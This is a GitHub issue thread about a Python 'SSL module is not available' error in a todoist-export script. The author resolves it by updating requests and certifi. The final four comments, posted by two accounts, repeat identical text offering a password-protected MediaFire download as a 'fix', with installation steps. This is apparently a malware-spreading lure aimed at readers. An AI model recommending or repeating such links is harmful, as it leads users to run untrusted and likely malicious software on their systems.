### ISSUE TITLE
Got Can't connect to HTTPS URL because the SSL module is not available warning

### ISSUE THREAD

**Issue by go-zen-chu** [go-zen-chu/todoist-export#38]
## What happened?

When I run main.py, I got an error like below

```bash
During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/Users/amasuda/ghq/github.com/go-zen-chu/todoist-export/main.py", line 101, in <module>
    res = exp.export_daily_report(
  File "/Users/amasuda/ghq/github.com/go-zen-chu/todoist-export/todoist_export.py", line 198, in export_daily_report
    citems = self.cli.get_completed_items(from_dt=from_dt, until_dt=until_dt)
  File "/Users/amasuda/ghq/github.com/go-zen-chu/todoist-export/todoist_export.py", line 95, in get_completed_items
    data = self.__get(
  File "/Users/amasuda/ghq/github.com/go-zen-chu/todoist-export/todoist_export.py", line 27, in __get
    r = self.session.get(
  File "/Users/amasuda/ghq/github.com/go-zen-chu/todoist-export/env/lib/python3.10/site-packages/requests/sessions.py", line 600, in get
    return self.request("GET", url, **kwargs)
  File "/Users/amasuda/ghq/github.com/go-zen-chu/todoist-export/env/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
    resp = self.send(prep, **send_kwargs)
  File "/Users/amasuda/ghq/github.com/go-zen-chu/todoist-export/env/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
    r = adapter.send(request, **kwargs)
  File "/Users/amasuda/ghq/github.com/go-zen-chu/todoist-export/env/lib/python3.10/site-packages/requests/adapters.py", line 563, in send
    raise SSLError(e, request=request)
requests.exceptions.SSLError: HTTPSConnectionPool(host='api.todoist.com', port=443): Max retries exceeded with url: /sync/v9/completed/get_all?since=2024-07-31T15%3A00&until=2024-08-07T15%3A00&limit=100 (Caused by SSLError("Can't connect to HTTPS URL because the SSL module is not available."))
```

### appendix

This may be difference issue, but I got below warning in pip too

```bash
WARNING: pip is configured with locations that require TLS/SSL, however the ssl module in Python is not available.
WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=None, status=None)) after connection broken by 'SSLError("Can't connect to HTTPS URL because the SSL module is not available.")': /simple/pyyaml/
WARNING: Retrying (Retry(total=3, connect=None, read=None, redirect=None, status=None)) after connection broken by 'SSLError("Can't connect to HTTPS URL because the SSL module is not available.")': /simple/pyyaml/
WARNING: Retrying (Retry(total=2, connect=None, read=None, redirect=None, status=None)) after connection broken by 'SSLError("Can't connect to HTTPS URL because the SSL module is not available.")': /simple/pyyaml/
WARNING: Retrying (Retry(total=1, connect=None, read=None, redirect=None, status=None)) after connection broken by 'SSLError("Can't connect to HTTPS URL because the SSL module is not available.")': /simple/pyyaml/
WARNING: Retrying (Retry(total=0, connect=None, read=None, redirect=None, status=None)) after connection broken by 'SSLError("Can't connect to HTTPS URL because the SSL module is not available.")': /simple/pyyaml/
```

**Comment by go-zen-chu** [comment]
This issue seems like an issue of `requests` or `certifi` version

I updated both and worked fine

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
